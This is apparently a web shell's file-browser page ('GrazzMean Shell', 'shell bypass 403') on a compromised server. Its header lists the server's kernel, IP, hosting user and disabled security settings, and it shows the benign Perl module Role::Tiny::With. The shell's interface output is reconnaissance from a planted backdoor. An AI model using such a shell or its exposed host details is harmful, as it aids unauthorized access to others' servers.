shell bypass 403

GrazzMean Shell

: /usr/share/perl5/vendor_perl/Role/Tiny/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.135.208.191
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : With.pm
package Role::Tiny::With;

use strict;
use warnings;

our $VERSION = '2.000006';
$VERSION = eval $VERSION;

use Role::Tiny ();

use Exporter 'import';
our @EXPORT = qw( with );

sub with {
    my $target = caller;
    Role::Tiny->apply_roles_to_package($target, @_)
}

1;

=head1 NAME

Role::Tiny::With - Neat interface for consumers of Role::Tiny roles

=head1 SYNOPSIS

 package Some::Class;

 use Role::Tiny::With;

 with 'Some::Role';

 # The role is now mixed in

=head1 DESCRIPTION

C<Role::Tiny> is a minimalist role composition tool.  C<Role::Tiny::With>
provides a C<with> function to compose such roles.

=head1 AUTHORS

See L<Role::Tiny> for authors.

=head1 COPYRIGHT AND LICENSE

See L<Role::Tiny> for the copyright and license.

=cut


© 2025 GrazzMean